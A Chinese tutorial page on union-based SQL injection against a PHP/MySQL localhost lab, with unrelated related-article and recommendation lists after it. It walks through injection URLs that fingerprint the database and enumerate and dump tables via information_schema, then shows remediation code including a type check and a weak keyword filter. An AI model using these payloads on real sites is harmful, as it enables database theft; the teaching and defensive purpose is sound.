注入利用函数:

  • concat()函数将多个字符串连接成一个字符串
  • database() 当前数据库,用途:获取数据
  • version() 数据库版本,用途:利用版本特性,如5.0版本下的information_schema库
  • user() 当前数据库用户,用途:判断权限
  • @@version_compile_os 操作系统版本,用途:主要用来避免linux和windows的大小写问题影响

mysql5.0及以上版本默认有一个information_schema数据库,其中保存有所有数据库表名和列名信息。

可以打开phpmyadmin,分别在information_schema数据库的tables表和columns表查看所有表信息,了解下面的注入语句的本质。

information_schema数据库结构:

  tables表

    table_name列(存放所有表名)

    table_schema列(数据库名,条件注入时转为16进制格式)

  columns表

    column_name表(存放所有列名)

    table_name列(存放所有表名)

    table_schema列(数据库名,条件注入时一般直接找指定表的列名,不需要再指定库名)

    table_collation表(字符编码,utf8_general_ci)

一、php+mysql 联合查询注入

http://127.0.0.1/1.php?x=1 and 1=2

http://127.0.0.1/1.php?x=1 order by 3

http://127.0.0.1/1.php?x=1 UNION SELECT 1,2,3

http://127.0.0.1/1.php?x=1 UNION SELECT database(),version(),user()

http://127.0.0.1/1.php?x=1 UNION SELECT CONCAT(DATABASE(),0x20,VERSION(),0x20,USER(),0x20,@@VERSION_COMPILE_OS),2,3

用户ID:sqlin 5.5.53 root@localhost Win32

http://127.0.0.1/1.php?x=1 UNION SELECT CONCAT(TABLE_NAME,0x20,TABLE_COLLATION),2,3 from information_schema.tables where table_schema=0x73716C696E

http://127.0.0.1/1.php?x=1 UNION SELECT CONCAT(column_name),2,3 from information_schema.columns where table_name=0x6E657773 //0x6E657773也可以用database()替代

http://127.0.0.1/1.php?x=1 UNION SELECT id,text,title FROM sqlin.news

http://127.0.0.1/1.php?x=1 UNION SELECT `key`,2,3 FROM sqlin.data

key在数据库中是关键字,需要用反引号引起来

用户ID:www.xiaodi8.com

  

二、注入产生的原因及修复建议

1. 注入产生的原因:未对参数接收的值进行过滤

2. 修复建议:
2.1 判断传入的参数类型(数字,过滤非数字):

<?php

//定义接收参数

//1.定义数据库信息

//2.连接数据库,选择数据库,定义sql语句,执行语句

//3.返回结果并处理显示,关闭数据库

$id = $_GET['x'];//接收参数名为x的值并赋值给变量id

if(is_numeric($id)){ //如果接收过来的id变量的值是数字

	$conn = mysql_connect("127.0.0.1","root","root");//连接数据库

	mysql_select_db("sqlin",$conn);//选择数据库

	$sql = "select * from news where id=$id";//定义sql语句

	$result = mysql_query($sql);//执行sql语句

	while($row = mysql_fetch_array($result)){//获取,遍历查询结果并显示

		echo "用户ID:".$row['id']."<br>";

		echo "文章标题:".$row['title']."<br>";

		echo "文章内容:".$row['text']."<br>";

		echo "<hr>";

	}

		mysql_close($conn);//关闭数据库连接

		echo "当前执行语句:".$sql."<hr>";

}else{

	echo "非法字符: ".$id;

}

?>

  

2.2 指定关键字过滤(过滤select等关键字,考虑大小写是否可绕过):

<?

//php语言开端

//php+mysql注入页面编程实现

/*

1.接受参数

2.数据库连接,选择,定义组合,执行

3.返回结果并处理显示

*/

function check_sql($id){ //过滤select关键字

	$id = str_replace("select","",$id);

	return $id;

}

$id = $_GET['x'];//接受参数名x的值并赋值给变量id

//$id = str_replace("select","",$id);

$id = check_sql($id);

//echo $id;

$conn = mysql_connect("127.0.0.1","root","root");//连接数据库

mysql_select_db("sqlin",$conn);//选择数据库

$sql = "select * from news where id=$id";//定义sql语句

$result = mysql_query($sql);//执行sql语句

while($row = mysql_fetch_array($result)){ //遍历结果显示

	echo "用户ID:".$row['id']."<br >";

	echo "文章内容:".$row['text']."<br >";

	echo "文章标题:".$row['title']."<br >";

	echo "<hr>";

}

	mysql_close($conn);//关闭数据库连接

	echo "当前执行语句:".$sql."<hr>";

//php语言结尾

?>

  

end.

WEB安全 php+mysql5注入防御(一)的更多相关文章

  1. WEB安全 php+mysql5注入防御(二)

    第四天: 一.新的注入函数: ascii() substring("string",n,m)                     n>=1 limit n,m      ...

  2. [红日安全]Web安全Day1 - SQL注入实战攻防

    本文由红日安全成员: Aixic 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名 ...

  3. 【渗透攻防WEB篇】SQL注入攻击初级

    前言不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,这里我想问 ...

  4. 【渗透攻防Web篇】SQL注入攻击高级

    前言 前面我们学习了如何寻找,确认,利用SQL注入漏洞的技术,本篇文章我将介绍一些更高级的技术,避开过滤,绕开防御.有攻必有防,当然还要来探讨一下SQL注入防御技巧. 目录 第五节 避开过滤方法总结 ...

  5. web安全之XSS注入

    之前在做项目的时候有遇到一些安全问题,XSS注入就是其中之一 那么,什么是XSS注入呢? XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入 ...

  6. Bypass ngx_lua_waf SQL注入防御(多姿势)

    0x00 前言 ​ ngx_lua_waf是一款基于ngx_lua的web应用防火墙,使用简单,高性能.轻量级.默认防御规则在wafconf目录中,摘录几条核心的SQL注入防御规则: select.+ ...

  7. web安全-接入层注入

    web安全-接入层注入 1.关系型数据库 mysql 存放结构化数据 高效操作大量数据 方便处理数据之间的关联关系 2.SQL注入 select * from table where id=${id} ...

  8. 简单了解:Web前端攻击方式及防御措施

    一.XSS [Cross Site Script]跨站脚本攻击  恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用 ...

  9. 23. Bypass ngx_lua_waf SQL注入防御(多姿势)

    0x00 前言 ngx_lua_waf是一款基于ngx_lua的web应用防火墙,使用简单,高性能.轻量级.默认防御规则在wafconf目录中,摘录几条核心的SQL注入防御规则: select.+(f ...

随机推荐

  1. 图解源码之FutureTask篇(AQS应用)

    所以,FutureTask既可以由Executor来调度执行,也可以由调度线程调用FutureTask.run()直接执行. FutureTask是通过AQS的模板设计模式来实现阻塞get方法的. 从 ...

  2. SpringBoot 初体验

    1.Spring Boot 简介 简化Spring应用开发的一个框架 整个Spring技术栈的一个大整合 J2EE开发的一站式解决方案 2.微服务 2014, martin fowler 微服务:架构 ...

  3. docker 安装PIL python 报错 IOError: decoder zip not available

    按照网上得方法:安装依赖库:yum install freetype freetype-develyum install libjpeg libjpeg-develyum install zlib z ...

  4. java 通用对象排序

    一个排序类,一个排序util? no.no.no…… 使用反射机制,写了一个通用的对象排序util,欢迎指正. 实体类: package entity; public class BaseTypeEn ...

  5. UOJ#55 [WC2014]紫荆花之恋

    题目描述 强强和萌萌是一对好朋友.有一天他们在外面闲逛,突然看到前方有一棵紫荆树.这已经是紫荆花飞舞的季节了,无数的花瓣以肉眼可见的速度从紫荆树上长了出来. 仔细看看的话,这个大树实际上是一个带权树. ...

  6. windows10(本机)与VirtualBox中CentOS7(虚拟机)互相访问总结

    先把我这里的环境说下: 本机(windows10),发布了一个tomcat服务:http://192.168.0.106:8080/axis/services/VPMService?wsdl 如下图: ...

  7. MySQL数据库(8)----表的创建、删除、索引和更改

    MySQL允许使用 CREATE TABLE 语句和 DROP TABLE 语句来创建.删除表,使用 ALTER TABLE 语句更改其结构.CREATE INDEX 语句和 DROP INDEX 语 ...

  8. Setting up a Single Node Cluster Hadoop on Ubuntu/Debian

    Hadoop: Setting up a Single Node Cluster. Hadoop: Setting up a Single Node Cluster. Purpose Prerequi ...

  9. 软工读书笔记 week3 (《黑客与画家》上)

    一.何谓黑客? 黑客,在我们大多数普通人眼里,就是入侵计算机的人,通常还与干坏事挂钩.而书中告诉我们,这 并不是它的真正含义.而要想理解这本书,就要首先理解什么是黑客. 黑客这个词最初起源时,完全是一 ...

  10. mac 下常用快捷键

    1.快速搜索某个类 双击thift 2.切换不同的类: ctrl+方向键 3.alt+command+B 进入到具体的子类 但是 ctrl+方向键一直切的是电脑上 桌面的切换.打开 系统偏好设置-快捷 ...